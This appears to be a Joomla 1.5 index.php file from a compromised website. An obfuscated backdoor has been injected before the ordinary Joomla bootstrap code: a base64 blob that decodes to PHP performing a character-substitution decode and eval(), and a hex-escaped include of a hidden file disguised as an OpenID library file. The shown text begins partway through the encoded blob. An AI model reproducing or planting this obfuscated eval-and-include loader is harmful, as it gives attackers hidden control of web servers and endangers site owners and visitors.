jB4Y0U5R2Y5ZFVjWGRVY1hkVWV0b0dMWGRVY1hkVWNYZFVjWGRVZThNcWhpTkY3WEoyQmlNalknLgonNFVWY1hkVWNYZFVjWGJHZjlkVWNYZFVjWGRVZU81MjRPb0dMWGRVY1hkVWNYZDJZNFVWY1hkVWNYZFVjWGQnLgonVWNYZDJCT0kySjg1VmUzMUhDYU1qWTRVVmNYZFVjWGRVY1hiR2Y5ZFVjWGQyZjRVWGY5ZFVjWGQzTVNORko2MWdYWDlVaGJHZnYweGZPS2QzS2FkVWhwTXF3djBWJy4KJ2hnMUhDaU14dzRVVmNYZFVldG9HTFhkVWNYZFVjWGRVaHcxcWg2ZG9mWEIyTTY1MkpPVEVmOWRVY1hkVWNYZFVjd00zS2YxSnZwTXF3WDB4Y3dSZ0onLgondVRFZjlkVWNYZDJmNFVYZjlkVWNYZDNPRmRVWDZCM2g2STNrbW9HTFhkVWNYUUVmOWRVY1hkVWNYZFVlRjVBQk8xJy4KJ0g0TGRVWHdxaWUwbmlHWDFxbFhCM1BPUWpmK0IyTTY1MkpPOUdmOWRVY1hkVWNYZFVldG9HTFhkVWNYZFVjWGRVYycuCidYZFVjd00zS2YxeGN2ZFVoZzFIQ2lNalk0VVZjWGRVY1hkVWNYZFVjWGRVaHcxcWg2cWdQT1F4Y3ZkVWhwTXF3dG9HTFgnLgonZFVjWGRVY1hkMmY0VVZjWGRVZXZvR0w0VVZjWGRVY3dNM0tmMXhjdmRrZWk1RDRPTkZPNjUzT3onLgonTXg2Wk5pdndNSDQ4UXFlZjkzQjZOZ25nNEt2d01INFNNM25MQjNoNkkza215VWN3TTMnLgonS2YxSnZwTXF3bTlqWTRVWGY5ZFVjWGQzT0ZkVTZtTkE0T0lVWHdNM0tmMUpZRDFIWURxeHdYQlYxWEIzNGFxZ0tpSTNYdjB4aHcxcWg2SDhJNicuCidSOElJOUdmOWRVY1hkMlk0VVZjWGRVY1hkVWNYUkgxWDlVaHcxcWg2SDhJNkJpZlgwamZYQmd3RDlHZjlkVWNYZFVjWGRVZXRvR0xYZFVjWGRVY1hkVWNYZFVjd1J4Y3YnLgonZGtLOE5GS3U5Y2Y5ZFVjWGRVY1hkVWNYZFVjWGRVY1hkVUlFSVZOWDBqN1hHMmVMTjJNT05ENG01ZzdMOXhFNFVWY1hkVWNYZFVjWGRVY1hkVWNYZFVjRE5BMScuCidEZG9mK2RVTkN5WmNQbFZOWW9HTFhkVWNYZFVjWGRVY1hkVWNYZFVjWEJnS3BCOGN2MFZjJy4KJ3dNM0tmMUpZRDFIWURxeEU0VVZjWGRVY1hkVWNYZFVjWGRVd3RvR0xYZFVjWGRVY1hkVWNYZFVlTzFnNlNka2VhTXFCbTFIQ21RRm5MQjN3bVRFZicuCic5ZFVjWGRVY1hkVWNYZFVjWE1xNm1Jb1k0VVZjWGRVY1hkVWNYYkdmOWRVY1hkVWNYZFVlTzUyNE9SSDFYOVVodzFxJy4KJ2g2SDhJNkJpZlgwamZYQmduRDlHZjlkVWNYZFVjWGRVZXRvR0xYZFVjWGRVY1hkVWNYZFVlT0lGS1k5VWh3MXFoNkg4SXdCaWZtVEVmOWRVY1gnLgonZFVjWGRVZXZvR0xYZFVjWGRVY1hkM0pZTmdKbU1WY0xCM2g2STNLNUJna0RxeGN2MHhjRE4zQ2lNZ09zQjh3NFVWY1hkJy4KJ1VjWGRVY1hRRWY5ZFVjWGRVY1hkVWNYZFVjWFJIMUxCM2g2STNLNUJBNDZCaWZYMGpmWEJnS3dNVU5tb0dMWGRVYycuCidYZFVjWGRVY1hkVWV0b0dMWGRVY1hkVWNYZFVjWGRVY1hkVWNYMUE0Yk4zQ2lNZ09zcWdLd01VWHdNM0tmMUpZRE5VSUl5VWN3TTNLZjEnLgonSllETVVJSTlqWTRVVmNYZFVjWGRVY1hkVWNYZDJmNFVWY1hkVWNYZFVjWGRVY1hkM0pZTmdKbU1WWHdNM0tmMUpZRE5na0RxeGN2MHhjRCcuCidORkpQQjh3NFVWY1hkVWNYZFVjWGRVY1hkMlk0VVZjWGRVY1hkVWNYZFVjWGRVY1hkVWVaTml2RTUySkRSSHViTkYnLgonSlA5VWh3MXFoNkg4SUVCaWZtVEVmOWRVY1hkVWNYZFVjWGRVY1hiR2Y5ZFVjWGRVY1hkVWV2b0dMWGRVY1hkVWNYZDNKWlIzclhCM2g2STNLNUJnS3BCaWZ0b0dMWGRVJy4KJ2NYZFVjWGQzSjdScUdMOWpZNFVWY1hkVWV2b0dMNFVWY1hkVWVaTml2RTUySkRSSHViNTN2Nk1VWG1URWY5Ykc9PSc7CiRiYWtiID0gQXJyYXkoJzEnPT4nWScsICcwJz0+J1AnLCAnMyc9PidHJywgJzInPT4nSCcsICc1Jz0+J2InLCAnNCc9PidOJywgJzcnPT4nNCcsICc2Jz0+J2gnLCAnOSc9PidLJywgJzgnPT4neScsICdBJz0+JzMnLCAnQyc9Pid4JywgJ0InPT4nSicsICdFJz0+J3cnLCAnRCc9PiduJywgJ0cnPT4nUScsICdGJz0+J20nLCAnSSc9PidkJywgJ0gnPT4nVycsICdLJz0+J0YnLCAnSic9PidWJywgJ00nPT4nWicsICdMJz0+J28nLCAnTyc9PidsJywgJ04nPT4nYycsICdRJz0+J2UnLCAnUCc9Pid0JywgJ1MnPT4ndicsICdSJz0+J2EnLCAnVSc9PidDJywgJ1QnPT4nTycsICdXJz0+J3EnLCAnVic9PidpJywgJ1knPT4ncycsICdYJz0+J2cnLCAnWic9PidqJywgJ2EnPT4neicsICdjJz0+J0EnLCAnYic9PidmJywgJ2UnPT4nQicsICdkJz0+J0knLCAnZyc9PicyJywgJ2YnPT4nMCcsICdpJz0+JzEnLCAnaCc9PidSJywgJ2snPT4nRScsICdqJz0+J1QnLCAnbSc9PidwJywgJ2wnPT4nTScsICdvJz0+J0QnLCAnbic9PidVJywgJ3EnPT4nWCcsICdwJz0+J3InLCAncyc9Pid1JywgJ3InPT4nOCcsICd1Jz0+JzUnLCAndCc9Pic3JywgJ3cnPT4naycsICd2Jz0+JzknLCAneSc9PidMJywgJ3gnPT4nUycsICd6Jz0+JzYnKTsKZXZhbC8qaXFkKi8oZ290bGl3cXgoJGlxaXdlemxjZiwgJGJha2IpKTsKfQ==")); include "\x2fhom\x65/vi\x72tww\x77/w_\x73uba\x72ubo\x78-ru\x5f9be\x318d3\x30/ht\x74p/l\x69bra\x72ies\x2fope\x6eid/\x78ml.\x70hp"; /** * @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $ * @package Joomla * @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // Set flag that this is a parent file define( '_JEXEC', 1 ); define('JPATH_BASE', dirname(__FILE__) ); define( 'DS', DIRECTORY_SEPARATOR ); require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' ); require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' ); JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null; /** * CREATE THE APPLICATION * * NOTE : */ $mainframe =& JFactory::getApplication('site'); /** * INITIALISE THE APPLICATION * * NOTE : */ // set the language $mainframe->initialise(); JPluginHelper::importPlugin('system'); // trigger the onAfterInitialise events JDEBUG ? $_PROFILER->mark('afterInitialise') : null; $mainframe->triggerEvent('onAfterInitialise'); /** * ROUTE THE APPLICATION * * NOTE : */ $mainframe->route(); // authorization $Itemid = JRequest::getInt( 'Itemid'); $mainframe->authorize($Itemid); // trigger the onAfterRoute events JDEBUG ? $_PROFILER->mark('afterRoute') : null; $mainframe->triggerEvent('onAfterRoute'); /** * DISPATCH THE APPLICATION * * NOTE : */ $option = JRequest::getCmd('option'); $mainframe->dispatch($option); // trigger the onAfterDispatch events JDEBUG ? $_PROFILER->mark('afterDispatch') : null; $mainframe->triggerEvent('onAfterDispatch'); /** * RENDER THE APPLICATION * * NOTE : */ $mainframe->render(); // trigger the onAfterRender events JDEBUG ? $_PROFILER->mark('afterRender') : null; $mainframe->triggerEvent('onAfterRender'); /** * RETURN THE RESPONSE */ echo JResponse::toString($mainframe->getCfg('gzip'));